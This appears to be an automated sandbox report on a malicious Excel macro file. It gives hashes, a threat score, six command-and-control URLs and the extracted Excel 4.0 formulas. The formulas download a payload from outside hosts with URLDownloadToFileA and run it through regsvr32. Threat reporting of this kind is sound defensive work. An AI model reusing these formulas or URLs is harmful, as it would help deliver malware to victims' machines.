General

  • Target

    1d2ab188d3607f59898f5d4d80135e2881b3bfad44cfa6657ab5d1b013dd0000

  • Size

    45KB

  • MD5

    8574d3556d2265e288213c80de56fc57

  • SHA1

    f020d7e9fb20d417673777aa64f496ea7efd050d

  • SHA256

    1d2ab188d3607f59898f5d4d80135e2881b3bfad44cfa6657ab5d1b013dd0000

  • SHA512

    ab3400f79f2b05c5c7cdbb137ac9983a96434e2166edd129621b1980a5b0612356e0f5596134b527f7d90794afa3c71d6dc29dc1814fcca35aaefbf017d84e33

  • SSDEEP

    768:GqLrVo43DOevZCwrvtZmzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2tCo:NrVo43DwtT5fTR4Lh1NisFYBc3cr+U2T

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/

http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/

http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/

https://getlivetext.com/Pectinacea/AL5FVpjleCW/

http://janshabd.com/Zgye2/

https://justforanime.com/stratose/PonwPXCl/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://getlivetext.com/Pectinacea/AL5FVpjleCW/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/Zgye2/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://justforanime.com/stratose/PonwPXCl/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 1d2ab188d3607f59898f5d4d80135e2881b3bfad44cfa6657ab5d1b013dd0000
    .xlsm office2007